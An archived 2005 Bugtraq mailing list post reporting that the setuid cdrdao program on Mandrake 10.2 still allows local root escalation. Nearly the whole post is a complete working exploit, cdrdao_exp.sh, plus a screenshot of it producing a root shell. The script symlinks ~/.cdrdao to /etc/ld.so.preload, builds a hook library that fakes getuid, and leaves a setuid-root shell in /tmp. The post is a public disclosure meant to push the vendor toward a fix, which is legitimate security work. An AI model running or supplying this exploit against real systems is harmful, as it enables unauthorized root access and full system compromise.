lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 16 May 2005 03:09:10 -0000
From: newbug Tseng <newbug@...oot.org>
To: bugtraq@...urityfocus.com
Subject: cdrdao exploit for mandrake 10.2 ( Mandriva 2005)




Hi.
Seems cdrdao vulnerability still exist in Mandrake 10.2 (Mandriva 2005).
I've no idea why Mandrake always forgot to fix this vulnerability ...
Anyway, hope Mandrike will fix this vulnerability as soon as possible.

--- screenshot ---
[newbug@t43 ~]$ cat /etc/mandrake-release
Mandrakelinux release 10.2 (Limited Edition 2005) for i586
[newbug@t43 ~]$ rpm -qf `which cdrdao`
cdrdao-1.1.9-7mdk
[newbug@t43 ~]$ ./cdrdao_exp.sh
cdrdao private exploit
This exploit only for Mandrake series
newbug [at] chroot.org
May 2005
checking if cdrdao is setuid ...
[+] done.
checking if /etc/ld.so.preload already exist ...
[+] done.
checking if ~/.cdrdao already exist ...
[+] done.
preparing hook library ...
[+] done.
preparing shell program ...
[+] done.
link .cdrdao ==> /etc/ld.so.preload ...
[+] done.
compile hook library ...
[+] done.
compile shell program ...
[+] done.
run cdrdao ...
[+] done.
checking if /etc/ld.so.preload created successful...
[+] done.
!@#$@...%#$%!@%^
[+] Congratulation, You win the game !!
[root@t43 tmp]# id
uid=0(root) gid=0(root) groups=500(newbug)
[root@t43 tmp]# 
--- end of screenshot ---
--- cdrdao_exp.sh ---
#!/bin/sh
# cdrdao local root exploit
# newbug [at] chroot.org 
# IRC: irc.chroot.org #chroot
# May 2005
echo "cdrdao private exploit"
echo "This exploit only for Mandrake series"
echo "newbug [at] chroot.org" 
echo "May 2005"

echo "checking if cdrdao is setuid ...";
if [ ! -u /usr/bin/cdrdao ]; then
        echo "[-] Failed";
        exit
fi
echo "[+] done.";
echo "checking if /etc/ld.so.preload already exist ..."
if [ -f /etc/ld.so.preload ]; then
        echo "[-] Failed."
        exit
else
        echo "[+] done."
fi

echo "checking if ~/.cdrdao already exist ..."
if [ -f ~/.cdrdao ]; then
        rm -rf ~/.cdrdao
fi
echo "[+] done."

cd /tmp

echo "preparing hook library ..."
cat >ld.so.c<<EOF
#include <stdlib.h>
uid_t getuid()
{
        return 0;
}
EOF
echo "[+] done."
echo "preparing shell program ..."
cat >sh.c <<EOF
#include <stdio.h>
#include <unistd.h>

int main(int argc,char **argv)
{
        setreuid(0,0);
        setgid(0);

        unlink("/tmp/ld.so");
        if(getuid())
        {
                printf("[-] Failed.\n");
                unlink(argv[0]);
                exit(0);
        }
        printf("[+] Congratulation, You win the game !!\n");
        unlink("/etc/ld.so.preload");

        execl("/bin/bash","bash",(char *)0);

        return 0;
}
EOF
echo "[+] done."

echo "link .cdrdao ==> /etc/ld.so.preload ..."
ln -sf /etc/ld.so.preload ~/.cdrdao
echo "[+] done."

echo "compile hook library ..."
gcc -shared -o ld.so ld.so.c
echo "[+] done."
echo "compile shell program ..."
gcc -o sh sh.c
echo "[+] done."

umask 0

echo "run cdrdao ..."
cdrdao unlock --save >/dev/null 2>&1
echo "[+] done."

echo "checking if /etc/ld.so.preload created successful..."
if [ -f /etc/ld.so.preload ]; then
        echo "[+] done."
else
        echo "[-] Failed."
        exit
fi
echo "/tmp/ld.so">/etc/ld.so.preload
rm -f /tmp/sh.c
rm -f /tmp/ld.so.c
su -c "chown root.root /tmp/sh;chmod 4755 /tmp/sh" >/dev/null 2>&1
echo "!@#\$@...%#$%!@%^"
/tmp/sh
--- end of cdrdao_exp.sh ---

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ